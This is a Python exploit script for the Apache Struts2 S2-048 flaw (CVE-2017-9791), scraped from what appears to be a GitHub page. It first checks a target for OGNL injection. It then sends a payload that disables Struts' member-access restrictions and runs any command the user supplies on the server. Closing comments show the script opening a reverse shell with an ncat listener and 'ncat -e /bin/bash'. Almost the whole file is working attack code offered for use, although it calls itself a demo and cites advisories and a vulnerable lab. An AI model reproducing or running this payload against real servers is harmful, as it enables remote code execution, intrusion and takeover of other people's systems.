-
Notifications
You must be signed in to change notification settings - Fork 440
/
exploit_S2-048.py
112 lines (83 loc) · 3.89 KB
/
exploit_S2-048.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Just a demo for CVE-2017-9791
import logging
import urllib2
import urllib
import httplib
logging.basicConfig(level=logging.INFO, format="%(message)s")
log = logging.getLogger(__name__)
def check(url):
var_a = 'a' * 16
var_b = 'b' * 16
flag = var_a + var_b
payload = ""
payload += "%{"
payload += "'%s' + '%s'" % (var_a, var_b)
payload += "}"
httpResponse = send_payload_request(url, payload)
return True if (httpResponse and httpResponse.code == 200 and flag in httpResponse.read()) else False
def exploit(url, cmd):
assert check(url), Exception('not vulnerable')
log.info("[+] status: %s - vulnerable to Apache Struts2 S2-048", url)
log.info("[+] execmd: %s" % cmd)
# payload = "%{"
# payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
# payload += "(#_memberAccess?(#_memberAccess=#dm):"
# payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
# payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
# payload += "(#ognlUtil.getExcludedPackageNames().clear())."
# payload += "(#ognlUtil.getExcludedClasses().clear())."
# payload += "(#context.setMemberAccess(#dm))))."
# payload += "(@java.lang.Runtime@getRuntime().exec('%s'))" % cmd
# payload += "}"
payload = ""
payload += "%{(#_='multipart/form-data')."
payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
payload += "(#_memberAccess?(#_memberAccess=#dm):"
payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
payload += "(#ognlUtil.getExcludedPackageNames().clear())."
payload += "(#ognlUtil.getExcludedClasses().clear())."
payload += "(#context.setMemberAccess(#dm))))."
payload += "(#cmd='%s')." % cmd
payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
payload += "(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start())."
payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
try:
httpResponse = send_payload_request(url, payload)
if (httpResponse and httpResponse.code == 200):
log.info("[+] execute : %s\n%s", cmd, httpResponse.read())
except httplib.IncompleteRead as err:
log.info(err.partial)
def send_payload_request(url, payload):
httpResponse = None
try:
data = {
"name": payload,
"age": 20,
"__checkbox_bustedBefore": "true",
"description": 1
}
data = urllib.urlencode(data)
httpResponse = urllib2.urlopen(url, data)
except Exception as err:
log.exception("%s - %s", url, str(err))
return httpResponse
if __name__ == '__main__':
import sys
if len(sys.argv) != 3:
print("python %s <url> <cmd>" % sys.argv[0])
sys.exit(0)
log.info('[*] name : exploit Apache Struts2 S2-048')
url = sys.argv[1]
cmd = sys.argv[2]
exploit(url, cmd)
# $ ncat -v -l -p 4444 &
# $ python exploit_S2-048.py http://127.0.0.1:8080/2.3.15.1-showcase/integration/saveGangster.action "ncat -e /bin/bash 127.0.0.1 4444"
## References
# https://cwiki.apache.org/confluence/display/WW/S2-048
# http://bobao.360.cn/news/detail/4219.html
# http://fisheye.apache.org:8060/browse/struts/apps/showcase/src/main/java/org/apache/struts2/showcase/integration/SaveGangsterAction.java?r1=59f4f31a7f3800a540c168abc67b8800db3f2f97&r2=73da12e723c2737bd515946588ddcd898acf584a
# https://github.com/Loneyers/vuldocker/tree/master/struts2/s2-048